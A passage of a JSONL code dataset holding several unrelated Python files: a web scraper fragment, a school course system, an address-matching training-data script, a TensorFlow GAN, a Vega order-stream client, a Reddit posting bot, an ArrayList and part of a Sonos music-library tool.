self.parse_detail(html)\n\nif __name__ == '__main__':\n    hc = Selenium()\n    hc.run()\n\n\n\n# import requests\n# import pymongo\n# from lxml import etree\n# client = pymongo.MongoClient('localhost')\n# db = client['new_hc']\n# headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n# response = requests.get(\"http://www.js.hc360.com/\",headers=headers)\n\n","sub_path":"hc_selenium.py","file_name":"hc_selenium.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299544200","text":"#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport os\nfrom course_system.core.Basic import Basic\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nclass School(Basic):\n    '''School class'''\n    def __init__(self):\n        pass\n    def create_school(self,school_name,school_addr):\n        '''Create a school'''\n        if os.path.isfile(BASE_DIR + \"/course_system/db/school.json\"):\n            school_dict = Basic.read(self,'school.json')\n        else:\n            school_dict = {}\n        school_dict[school_name] = {'addr':school_addr}\n        w = Basic()\n        w.write(school_dict,'school.json')\n        print('School [%s] at address [%s] created successfully!' % (school_name, school_addr))
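\n        # editor's note: school.json ends up as a simple name -> info mapping,\n        # e.g. {'MIT': {'addr': 'Cambridge'}} (illustrative values only)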
\n    def create_course(self,school_name,course_name,course_tuition):\n        '''Create a course'''\n        if os.path.isfile(BASE_DIR + \"/course_system/db/course.json\"):\n            course_dict = Basic.read(self,'course.json')\n        else:\n            course_dict ={}\n        course_dict[course_name] = {'school':school_name,'tuition':course_tuition}\n        w = Basic()\n        w.write(course_dict,'course.json')\n        print('School [%s]: course [%s] created successfully!' %(school_name,course_name))\n    def create_teacher(self,teacher_name,teacher_salary,school_name):\n        '''Create a teacher'''\n        if os.path.isfile(BASE_DIR + \"/course_system/db/teacher.json\"):\n            teacher_dict = Basic.read(self,'teacher.json')\n        else:\n            teacher_dict = {}\n        teacher_dict[teacher_name] = {'school': school_name,'salary': teacher_salary,}\n        Basic.write(self, teacher_dict, 'teacher.json')\n        print('Teacher [%s] hired successfully'%teacher_name)\n    def create_grade(self,school_name,grade_name,course_name,teacher_name):\n        '''Create a class'''\n        if os.path.isfile(BASE_DIR + \"/course_system/db/grade.json\"):\n            grade_dict = Basic.read(self,'grade.json')\n        else:\n            grade_dict = {}\n        grade_dict[grade_name] = {'school':school_name,'course':course_name,'teacher':teacher_name,'student':[]}\n        w = Basic()\n        w.write(grade_dict,'grade.json')\n        print('Class [%s] created successfully'%grade_name)","sub_path":"day06/02作业/course_system/core/School.py","file_name":"School.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"312870773","text":"#!coding=utf8\nimport xlrd\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport sys\n#import xlrd\n#import jsonload\n#from jsonload import get_kv,loadFont,cal_dis\nfrom function_ultra import utils\nfrom function_ultra.mylog import logger\nimport time\nimport codecs\n\nlogger.debug(\"> start mark\")\nlabelmap = {}\nlabelmap[\"B\"] = 0\nlabelmap[\"I\"] = 1\nlabelmap[\"O\"] = 2\nlabelmap[\"S\"] = 3\n\ndef cost_matrix_value(cost):\n    row_ind,col_ind=linear_sum_assignment(cost)\n    #print(row_ind)# row indices into the cost matrix\n    #print(col_ind)# column index of the optimal assignment for each row\n    #print(cost[row_ind,col_ind])# gather the assigned elements into an array\n    #print(cost[row_ind,col_ind].sum())# sum of that array\n    return cost[row_ind,col_ind].sum(),row_ind,col_ind\n#for i,j in zip(row_ind, col_ind):\n#    print(cost[i,j])\n\n\ndef matrix_build_extract(contl,contr,dct=None,weight=0):\n    #ichar_num = [\"一\",\"二\",\"三\",\"四\",\"五\",\"六\",\"七\",\"八\",\"九\",\"零\"]\n    #ichar_num.extend([\"栋\",\"单元\",\"层\",\"号\",\"室\",\"户\"])\n    ichar_num = [\" \"]\n    #pdb.set_trace()\n    mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n    #mulby= (len(contl)-len(contr))**2\n    #mulby+=2\n    mulby=1\n    for i in range(len(contl)):\n        ll=1+len(contl)-i\n        for j in range(len(contr)):\n            lr=1+len(contr)-j\n            #if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n            #    mat[i][j]=0\n            #if contl[i] in ichar_num or contr[j] in ichar_num:\n            #    mulby=0\n            #    mulby=0\n            #if False:\n            #    pass\n            #pdb.set_trace()\n            #mat[i][j]=(1/len(contl))\n            #    mat[i][j]=0\n            if contl[i]==contr[j]:\n                mat[i][j]=0\n            else:\n                if weight==1:# earlier positions matter more\n                    #mat[i][j]=1*mulby\n                    mat[i][j]=(ll+lr)*mulby\n                elif weight==-1:# later positions matter more\n                    mat[i][j]=(i+j)*mulby\n                    #mat[i][j]=(lr*ll*mulby)\n                    #mat[i][j]=np.log(10+(lr*ll*mulby))\n                elif weight==0:\n                    mat[i][j]=mulby\n                else:\n                    logger.log(\"there is something wrong\")\n                    pdb.set_trace()\n            assert lr>0\n            assert ll>0\n    return mat\n
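\n# editor's note: a minimal usage sketch for cost_matrix_value above\n# (illustrative values only):\n#   cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])\n#   total, rows, cols = cost_matrix_value(cost)\n#   # rows -> [0 1 2], cols -> [1 0 2], total -> 1 + 2 + 2 = 5\n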
\ndef matrix_build(contl,contr,dct=None,weight=0):\n    ichar_num = [\" \"]\n    mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n    mulby=1\n    for i in range(len(contl)):\n        ll=1+len(contl)-i\n        for j in range(len(contr)):\n            lr=1+len(contr)-j\n            if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n                mat[i][j]=0\n            else:\n                if weight==1:# earlier positions matter more\n                    mat[i][j]=(ll+lr)*mulby\n                elif weight==-1:# later positions matter more\n                    mat[i][j]=(i+j)*mulby\n                elif weight==0:\n                    mat[i][j]=mulby\n                else:\n                    logger.log(\"there is something wrong\")\n                    pdb.set_trace()\n            assert lr>0\n        assert ll>0\n    return mat\n\ndef hungry_match(mat,k1s,k2s):\n    s,r,c = cost_matrix_value(mat)\n    data = []\n    label = []\n    match = []\n    for i,j in zip(r,c):\n        if k1s[i]==k2s[j]:\n            match.append(j)\n        else:\n            pass\n    for i in range(len(k2s)):\n        if i in match:\n            data.append(k2s[i])\n            label.append(labelmap[\"I\"])\n        else:\n            data.append(k2s[i])\n            label.append(labelmap[\"O\"])\n    return data,label,s,r,c\n\ndef read_txt(filename,shuffle):\n    lines = codecs.open(filename,\"r\",\"utf-8\").readlines()\n    for line in lines:\n        if shuffle:\n            line = lines[np.random.randint(len(lines))]\n        line = line.split(\"&\")[0]\n        line = utils.clr(line)\n        yield line\n\n'''\ndef mark_from_txt_compare(filename):\n    gen = read_txt(filename)\n    _gen = read_txt(filename)\n    for i in gen:\n        for j in _gen:\n            if i == j:\n                continue\n            elif len(i)>len(j):\n                data, label,s,r,c = hungry_match(matrix_build(i,j),i,j)\n                yield (data,label)\n            else:\n                data, label,s,r,c = hungry_match(matrix_build(j,i),j,i)\n                yield (data,label)\n'''\ndef show_match(filename):\n    cnt = 100\n    with open(\"match_sample.txt\",\"r\") as f:\n        lines = f.readlines()\n        for line in lines:\n            kv = line.split(\"\\t\")\n            pas = \"\"\n            for i,j in zip(kv[0],kv[1]):\n                if j == \"1\":\n                    pas+=i\n                else:\n                    pas+=\"_\"\n            cnt-=1\n            if cnt<0:\n                time.sleep(0.2)\n                cnt=100\n\ndef read_xlrd(filename):\n    ad = xlrd.open_workbook(filename)\n    sts = ad.sheets()\n    rows = sts[0].get_rows()\n    result = []\n    for line in rows:\n        k = line[14].value\n        v = line[10].value\n        k = utils.clr(k)\n        v = utils.clr(v)\n        data,label,s,r,c= hungry_match(matrix_build(k,v),k,v)\n        yield (data,label,k,v)\n\ndef addr_classifier(k,v,dct,direct):\n    data,label,s,r,c= hungry_match(matrix_build(k,v,dct,direct),k,v)\n    return data,label,s,r,c\n\ndef init_ner_train_data(filename):\n    gen = read_txt(filename,shuffle=True)\n    f = open(filename,\"a+\")\n    for sent in gen:\n        sent = utils.clr(sent)\n        for char in sent:\n            f.write(\"%s O\\n\"%char)\n        f.write(\"\\n\")\n    f.close()\n\ndef sent_pair_gen(filename):\n    with open(filename, \"a+\") as gh:\n        gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n        for i in gen:\n            k = i[2]\n            v = i[3]\n            gh.write(\"%s %s\\n\"%(k,v))\n            gh.flush()\nimport re\n\ndef seperate_zhengz_address(filename):\n    rt = open(\"/home/dell/data/zhengz_train.txt\",\"w+\")\n    wx = open(\"/home/dell/data/zhengz_dev.txt\",\"w+\")\n    tmp = []\n    with open(filename) as f:\n        lines = f.readlines()\n        for line in lines:\n            line = re.sub(\"[\\r\\n]\",\"\",line)\n            line = re.sub(\"NONE\",\"\",line)\n            line = re.sub(\" \",\"\",line)\n            line = utils.clr(line)\n            if 'ROOT' in line:\n                qua,ans = line.split('ROOT')\n                rt.write(\"%s %s 0\\n\"%(qua,ans))\n            else:\n                if len(tmp) == 2:\n                    rt.write(\"%s %s 1\\n\"%(tmp[0],tmp[1]))\n                    tmp = []\n                else:\n                    tmp.append(line)\n    rt.close()\n    wx.close()\n\n\ndef zhengz_train_data_gen_sent_pairs():\n    standf = '/home/dell/data/zz_std_words.txt'\n    samplef = '/home/dell/data/eval_zz.txt'\n    filename = \"/home/dell/data/zhengz_comp.txt\"\n    stand = read_txt(standf,shuffle=True)\n    sampl = read_txt(samplef,shuffle=True)\n    cont = open(filename,\"w+\")\n    index = 0\n    for lstd in stand:\n        for lsam in sampl:\n            cont.write('%s %s\\n'%(lstd,lsam))\n            index+=1\n            if index>1000000:\n                break\n    stand.close()\n    sampl.close()\n    cont.close()\n\ndef train_data_gen_sent_pairs(filename,writeintrain,writeintest):\n    with open(writeintrain,\"w+\") as g:\n        with open(writeintest,\"w+\") as h:\n            with open(filename,\"r\") as f:\n                lines = f.readlines()\n                sep = int(len(lines)*0.9//1)\n                for line in lines[:sep]:\n                    line = re.sub(\"[\\r\\n]\",\"\",line)\n                    sent_a, sent_b = line.split(\" \")\n                    g.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n                    cnt = np.random.randint(len(lines))\n                    g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n                    cnt = np.random.randint(len(lines))\n                    g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n                    cnt = np.random.randint(len(lines))\n                    g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n                for line in lines[sep:]:\n                    line = re.sub(\"[\\r\\n]\",\"\",line)\n                    sent_a, sent_b = line.split(\" \")\n                    h.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n                    cnt = np.random.randint(len(lines))\n                    h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n                    cnt = np.random.randint(len(lines))\n                    h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n                    cnt = np.random.randint(len(lines))\n                    h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n\n\nif __name__ == \"__main__\":\n    #sent_pair_gen(\"./sent_pair_word.txt\")\n    #zhengz_train_data_gen_sent_pairs()\n    #pdb.set_trace()\n    #seperate_zhengz_address(\"/home/dell/data/output_zz.txt\")\n\n    #train_data_gen_sent_pairs(\"/home/dell/data/sent_pair_word.txt\",\"/home/dell/data/example_train_sentpair_zhongtianhuayuan\", \\\n    #\"/home/dell/data/example_test_sentpair_zhongtianhuayuan\")\n    #gen = read_xlrd(\"data/addr_guiyang_zhongtian_huayuan.xlsx\")\n    #for i in gen:\n    #    print(i)\n    #filename = sys.argv[1]\n    #init_ner_train_data(filename)\n    with open(\"match_sample_reverse.txt\",\"a+\") as gh:\n        #gen = mark_from_txt_compare(\"/data/network_zz/output/doc_pre_handle.txt\")\n        gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n        print(gen)\n        for i in gen:\n            print(i)\n            k = \"\".join(i[0])\n            v = \"\".join([str(_) for _ in i[1]])\n            for ii,jj in zip(k,v):\n                gh.write(\"%s %s\\n\"%(ii,jj))\n            gh.write(\"\\n\")\n            gh.flush()\n            #if \"1\" in \"\".join([str(_) for _ in i[1]]):\n            #    pdb.set_trace()\n\n","sub_path":"yunyan_baotou/src/business_ultra/mark_train_data.py","file_name":"mark_train_data.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355489025","text":"\"\"\"\nDisplay graphs of the data\n\"\"\"\n\nimport streamlit as st\nfrom facebook.data.fetch_from_api import get_fb_posts\n\n\ndef display_facebook():\n    \"\"\"\n    Display Facebook posts data\n    \"\"\"\n    fb_posts = get_fb_posts()\n    st.header(\"Facebook posts\")\n    st.write(fb_posts)\n    st.subheader(\"Total likes\")\n    st.line_chart(data=fb_posts['statistics.actual.likeCount'])\n","sub_path":"facebook/visualizations/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94995609","text":"from functools import partial\nimport tensorflow as tf\nimport neural_nets.nn as nn\n\nclass SimpleGan:\n\n    def __init__(self,\n                 crop_size=100,\n                 lr=.0001,\n                 wasserstein=False):\n\n        #\"\"\" graph \"\"\"\n        # resnet_model\n        self.generator = partial(nn.generator, scope='generator')\n        self.discriminator = partial(nn.discriminator, scope='discriminator')\n\n\n        # Placeholders\n        self.real = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 
3])\n self.noise = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n\n # Generator outputs\n self.generator_output = self.generator(self.noise)\n\n # Discriminator outputs\n self.discriminator_output_real = self.discriminator(self.real)\n self.discriminator_output_fake = self.discriminator(self.generator_output)\n\n if wasserstein:\n self.d_loss = tf.reduce_mean(self.discriminator_output_fake) - tf.reduce_mean(self.discriminator_output_real)\n self.g_loss = -tf.reduce_mean(self.discriminator_output_fake)\n\n else:\n # Generator loss\n self.g_loss = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.ones_like(self.discriminator_output_fake))\n\n # Discriminator loss\n self.d_loss_real = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_real, multi_class_labels=tf.ones_like(self.discriminator_output_real))\n self.d_loss_fake = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.zeros_like(self.discriminator_output_fake))\n self.d_loss = self.d_loss_real + self.d_loss_fake\n\n\n # Optimization\n t_var = tf.trainable_variables()\n d_var = [var for var in t_var if 'discriminator' in var.name]\n g_var = [var for var in t_var if 'generator' in var.name]\n\n self.d_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.d_loss, var_list=d_var)\n self.g_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.g_loss, var_list=g_var)\n\n\n # \"\"\" train \"\"\"\n # ''' init '''\n # session\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config)\n\n self.init_op = tf.global_variables_initializer()\n self.sess.run(self.init_op)\n\n #''' saver '''\n self.saver = tf.train.Saver(max_to_keep=None)","sub_path":"neural_nets/simple_gan.py","file_name":"simple_gan.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241422545","text":"#!/usr/bin/python3\n\n\"\"\"\nScript language: Python3\n\nTalks to:\n- Vega node (gRPC)\n\nApps/Libraries:\n- gRPC (node): Vega-API-client (https://pypi.org/project/Vega-API-client/)\n\"\"\"\n\n# Note: this file uses smart-tags in comments to section parts of the code to\n# show them as snippets in our documentation. 
They are not necessary to be\n# included when creating your own custom code.\n#\n# Example of smart-tags:\n# __something:\n# some code here\n# :something__\n\nimport os\nimport signal\nimport sys\n\n# __import_client:\nimport vegaapiclient as vac\n# :import_client__\n\nnode_url_grpc = os.getenv(\"NODE_URL_GRPC\")\n\ndef signal_handler(sig, frame):\n print('Exit requested.')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# __create_client:\n# Create a Vega gRPC data client\ndata_client = vac.VegaTradingDataClient(node_url_grpc)\n# :create_client__\n\n# __find_market:\n# Get a list of markets, and select the first market returned\nmarkets = data_client.Markets(vac.api.trading.MarketsRequest()).markets\nmarket_id = markets[0].id\n# :find_market__\n\n# __stream_orders:\n# Subscribe to the Orders stream for the marketID specified\n# Optional: Market identifier - filter by market\n# Party identifier - filter by party\n# By default, all orders on all markets for all parties will be returned on the stream.\nsubscribe_request = vac.api.trading.OrdersSubscribeRequest(market_id=market_id)\nfor stream_resp in data_client.OrdersSubscribe(subscribe_request):\n for order in stream_resp.orders:\n # All orders arriving over the channel/stream will be printed\n print(order)\n# :stream_orders__\n","sub_path":"stream-orders-and-trades/stream-orders-with-Vega-API-client.py","file_name":"stream-orders-with-Vega-API-client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247570126","text":"import praw\r\nimport time\r\n\r\n\r\ndef main():\r\n posttopfifty()\r\n postlog()\r\n\r\ndef posttopfifty():\r\n topfifty = \"Post# | Title | Subreddit | Url | Upvotes \\n ---|---|---|----|---- \\n\"\r\n counter = 1\r\n for submission in reddit.subreddit('all').top('day', limit=50):\r\n topfifty += \"{} | {} | /r/{} | [link]({}) | {} \\n\".format(counter, submission.title, submission.subreddit,\r\n submission.url, submission.score)\r\n counter += 1\r\n reddit.subreddit('GraxPy').submit(time.strftime('%m/%d/%y'), topfifty)\r\n print('posted')\r\n\r\n\r\ndef postlog():\r\n f = open(r'C:\\Users\\Wilson\\desktop\\python.txt', 'w')\r\n f.write('Posted to reddit: {}\\n'.format(time.strftime('%x %X')))\r\n f.close()\r\n\r\nif __name__ == '__main__':\r\n reddit = praw.Reddit('bot')\r\n main()\r\n","sub_path":"GraxPyPost.py","file_name":"GraxPyPost.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463772432","text":"# An ArrayList is one of\r\n# - None\r\n# - ArrayList(array, int, int)\r\nclass ArrayList:\r\n def __init__(self, array, size, capacity=10):\r\n if array == [None] or array is None:\r\n self.array = [None] * capacity\r\n else:\r\n self.array = array\r\n self.size = size\r\n self.capacity = capacity\r\n\r\n def __eq__(self, other):\r\n return ((type(other) == ArrayList)\r\n and self.array == other.array\r\n and self.size == other.size\r\n and self.capacity == other.capacity\r\n )\r\n\r\n def __repr__(self):\r\n return \"ArrayList({!r}, {!r}, {!r})\".format(self.array, self.size, self.capacity)\r\n\r\n\r\n# None -> ArrayList\r\n# Returns an empty ArrayList\r\ndef empty_list():\r\n return ArrayList([None], 0)\r\n\r\n\r\n# ArrayList int value -> ArrayList\r\n# Takes an ArrayList, an index, and a value, places the value at the given index in the list, and returns it\r\ndef add(array, index, value):\r\n if 
array.size == array.capacity:\r\n        array = double_capacity(array)\r\n\r\n    if index > array.size or index < 0:\r\n        raise IndexError\r\n    else:\r\n        for i in range(array.size - 1, index - 1, -1):\r\n            array.array[i + 1] = array.array[i]\r\n        array.array[index] = value\r\n        array.size += 1\r\n        return array\r\n\r\n\r\n# ArrayList -> ArrayList\r\n# Doubles the capacity of an ArrayList\r\ndef double_capacity(array):\r\n    double = ArrayList([None], array.size, array.capacity * 2)\r\n    for i in range(array.size):\r\n        double.array[i] = array.array[i]\r\n    return double\r\n\r\n\r\n# ArrayList -> int\r\n# Takes an ArrayList and returns the number of elements in the list\r\ndef length(array):\r\n    return array.size\r\n\r\n\r\n# ArrayList int -> value\r\n# Takes an ArrayList and an index and returns the value at the given index\r\ndef get(array, index):\r\n    if index >= array.size or index < 0:\r\n        raise IndexError\r\n    else:\r\n        return array.array[index]\r\n\r\n\r\n# ArrayList int value -> ArrayList\r\n# Takes an ArrayList, an index, and a value and replaces the element at the index in the list with the given value\r\ndef set(array, index, value):\r\n    if index >= array.size or index < 0:\r\n        raise IndexError\r\n    else:\r\n        array.array[index] = value\r\n        return array\r\n\r\n\r\n# ArrayList int -> (value, ArrayList)\r\n# Takes an ArrayList and an index and removes the element at the index, returning the removed element and resulting list\r\ndef remove(array, index):\r\n    if index >= array.size or index < 0:\r\n        raise IndexError\r\n    else:\r\n        num = array.array[index]\r\n        for i in range(index + 1, array.size):\r\n            array.array[i - 1] = array.array[i]\r\n        array.array[array.size - 1] = None\r\n        array.size -= 1\r\n        return num, array\r\n","sub_path":"Projects/project-3-gmonteir/array_list.py","file_name":"array_list.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"309102035","text":"#!/usr/bin/env python\n\n\"\"\" socos is a commandline tool for controlling Sonos speakers \"\"\"\n\nfrom __future__ import print_function\n\n\n# Will be parsed by setup.py to determine package metadata\n__author__ = 'SoCo team '\n__version__ = '0.1'\n__website__ = 'https://github.com/SoCo/socos'\n__license__ = 'MIT License'\n\n\nimport sys\nimport os\nfrom collections import OrderedDict\nimport sqlite3\nimport json\nimport shlex\n\ntry:\n    # pylint: disable=import-error\n    import colorama\nexcept ImportError:\n    # pylint: disable=invalid-name\n    colorama = None\n\ntry:\n    import readline\nexcept ImportError:\n    # pylint: disable=invalid-name\n    readline = None\n\ntry:\n    # pylint: disable=redefined-builtin,invalid-name,undefined-variable\n    input = raw_input\nexcept NameError:\n    # raw_input has been renamed to input in Python 3\n    pass\n\nimport soco\nfrom soco.data_structures import MLTrack, MLAlbum, MLArtist, MLPlaylist\n\n\nclass MusicLibrary(object):\n    \"\"\"Class that implements the music library support for socos\"\"\"\n\n    def __init__(self):\n        # Sqlite3 variables\n        self.connection = None\n        self.cursor = None\n        # As a simple optimization we cache 10 searches\n        self.cached_searches = OrderedDict()\n        self.cache_length = 10\n        # Data types and table names\n        self.data_types = ['playlists', 'artists', 'albums', 'tracks']\n\n    def _open_db(self):\n        \"\"\"Open a connection to the sqlite3 database and if necessary create\n        the folders and path for it. The file will be saved to:
The file will be saved to:\n USERPATH/.config/socos/musiclib.db where USERPATH is as returned by\n os.path.expanduser\n \"\"\"\n if not self.connection:\n userdir = os.path.expanduser('~')\n dbdir = os.path.join(userdir, '.config', 'socos')\n if not os.path.exists(dbdir):\n os.makedirs(dbdir)\n yield 'Created folder: \\'{}\\''.format(dbdir)\n\n dbpath = os.path.join(dbdir, 'musiclib.db')\n if not os.path.exists(dbpath):\n yield 'Created Sqlite3 database for music library '\\\n 'information at: \\'{}\\''.format(dbpath)\n self.connection = sqlite3.connect(dbpath)\n self.cursor = self.connection.cursor()\n\n def index(self, sonos):\n \"\"\"Update the index of the music library information\"\"\"\n for string in self._open_db():\n yield string\n # Drop old tables\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n number_of_tables = len(self.cursor.fetchall())\n if number_of_tables == 4:\n yield 'Deleting tables'\n query = 'DROP TABLE {}'\n for table_name in self.data_types:\n self.cursor.execute(query.format(table_name))\n self.connection.commit()\n\n # Form new tables\n yield 'Creating tables'\n create_statements = [\n 'CREATE TABLE tracks (title text, album text, artist text, '\n 'content text)',\n 'CREATE TABLE albums (title text, artist text, content text)',\n 'CREATE TABLE artists (title text, content text)',\n 'CREATE TABLE playlists (title text, content text)',\n ]\n for create in create_statements:\n self.cursor.execute(create)\n self.connection.commit()\n\n # Index the 4 different types of data\n for data_type in self.data_types:\n for string in self._index_single_type(sonos, data_type):\n yield string\n\n def _index_single_type(self, sonos, data_type):\n \"\"\"Index a single type if data\"\"\"\n fields = self._get_columns(data_type)\n # Artist is called creator in the UPnP data structures\n if 'artist' in fields:\n fields[fields.index('artist')] = 'creator'\n\n # E.g: INSERT INTO tracks VALUES (?,?,?,?)\n query = 'INSERT INTO {} VALUES ({})'.format(\n data_type, ','.join(['?'] * len(fields)))\n\n # For brevity\n get_ml_inf = sonos.get_music_library_information\n\n total = get_ml_inf(data_type, 0, 1)['total_matches']\n yield 'Adding: {}'.format(data_type)\n count = 0\n while count < total:\n # Get as many matches as the device will give each time\n search = get_ml_inf(data_type, start=count, max_items=1000)\n for item in search['item_list']:\n # In the database we save a set of text fields and the content\n # dict as json. See self.index for details on fields.\n values = [getattr(item, field) for field in\n fields[:-1]]\n values.append(json.dumps(item.to_dict))\n self.cursor.execute(query, values)\n self.connection.commit()\n\n # Print out status while running because indexing tracks can take a\n # while\n count += search['number_returned']\n yield '{{: >3}}% {{: >{0}}} out of {{: >{0}}}'\\\n .format(len(str(total)))\\\n .format(count * 100 / total, count, total)\n\n def _get_columns(self, table):\n \"\"\"Return the names of the columns in the table\"\"\"\n query = 'PRAGMA table_info({})'.format(table)\n self.cursor.execute(query)\n # The table descriptions look like: (0, u'title', u'text', 0, None, 0)\n return [element[1] for element in self.cursor.fetchall()]\n\n def tracks(self, sonos, *args):\n \"\"\"Search for and possibly play tracks from the music library\n\n Usage: ml_tracks [field=]text [action] [number]\n\n Field can be 'title', 'album' or 'artist'. If field is not given, then\n 'title' is used. 
\n        'title' is used. Only a single word can be used as search text. Action\n        can be 'add' or 'replace' and number refers to the item number in the\n        search results.\n\n        Examples:\n        ml_tracks artist=metallica\n        ml_tracks unforgiven\n        ml_tracks unforgiven add 4\n        \"\"\"\n        for string in self._search_and_play(sonos, 'tracks', *args):\n            yield string\n\n    def albums(self, sonos, *args):\n        \"\"\"Search for and possibly play albums from the music library\n\n        Usage: ml_albums [field=]text [action] [number]\n\n        Field can be 'title' or 'artist'. If field is not given, then 'title'\n        is used. Only a single word can be used as search text. Action can be\n        'add' or 'replace' and number refers to the item number in the search\n        results.\n\n        Examples:\n        ml_albums artist=metallica\n        ml_albums black\n        ml_albums black add 1\n        \"\"\"\n        for string in self._search_and_play(sonos, 'albums', *args):\n            yield string\n\n    def artists(self, sonos, *args):\n        \"\"\"Search for and possibly play all by artists from music library\n\n        Usage: ml_artists text [action] [number]\n\n        'text' is searched for in the artist titles. Only a single word can\n        be used as search text. Action can be 'add' or 'replace' and number\n        refers to the item number in the search results.\n\n        Examples:\n        ml_artists metallica\n        ml_artists metallica add 1\n        \"\"\"\n        for string in self._search_and_play(sonos, 'artists', *args):\n            yield string\n\n    def playlists(self, sonos, *args):\n        \"\"\"Search for and possibly play playlists imported in the music library\n\n        Usage: ml_playlists text [action] [number]\n\n        'text' is searched for in the playlist titles. Only a single word\n        can be used as search text. Action can be 'add' or 'replace' and\n        number refers to the item number in the search results.\n\n        Examples:\n        ml_playlist metallica\n        ml_playlist metallica add 3\n        \"\"\"\n        for string in self._search_and_play(sonos, 'playlists', *args):\n            yield string\n\n    def _search_and_play(self, sonos, data_type, *args):\n        \"\"\"Perform a music library search and possibly play an item\"\"\"\n        # Open the data base\n        for string in self._open_db():\n            yield string\n\n        # Check if the music library has been indexed\n        query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n        self.cursor.execute(query)\n        if len(self.cursor.fetchall()) != 4:\n            message = 'Your music library cannot be searched until it has been '\\\n                      'indexed. First run \\'ml_index\\''\n            raise TypeError(message)\n        # Check if there is a search term\n        if len(args) < 1:
See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n # And finally perform the search\n results = self._search(data_type, *args)\n\n # If there are no other arguments then the search\n if len(args) == 1:\n for string in self._print_results(data_type, results):\n yield string\n # Or if there are the right number for a play command\n elif len(args) == 3:\n yield self._play(sonos, data_type, results, *args)\n # Else give error\n else:\n message = 'Incorrect play syntax: See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n def _search(self, data_type, *args):\n \"\"\"Perform the search\"\"\"\n # Process search term\n search_string = args[0]\n if search_string.count('=') == 0:\n field = 'title'\n search = search_string\n elif search_string.count('=') == 1:\n field, search = search_string.split('=')\n else:\n message = '= signs are not allowed in the search string'\n raise TypeError(message)\n\n # Pad the search term with SQL LIKE wild cards\n search = search.join(['%', '%'])\n # Do the search, if it has not been cached\n if (data_type, field, search) in self.cached_searches:\n results = self.cached_searches[(data_type, field, search)]\n else:\n if field in self._get_columns(data_type)[:-1]:\n # Perform the search in Sqlite3\n query = 'SELECT * FROM {} WHERE {} LIKE ?'.format(data_type,\n field)\n try:\n search = search.decode('utf-8')\n except AttributeError:\n pass\n self.cursor.execute(query, [search])\n results = self.cursor.fetchall()\n # Add results to the cache and reduce cache length if necesary\n self.cached_searches[(data_type, field, search)] = results\n while len(self.cached_searches) > self.cache_length:\n self.cached_searches.popitem(last=False)\n else:\n message = 'The search field \\'{}\\' is unknown. 
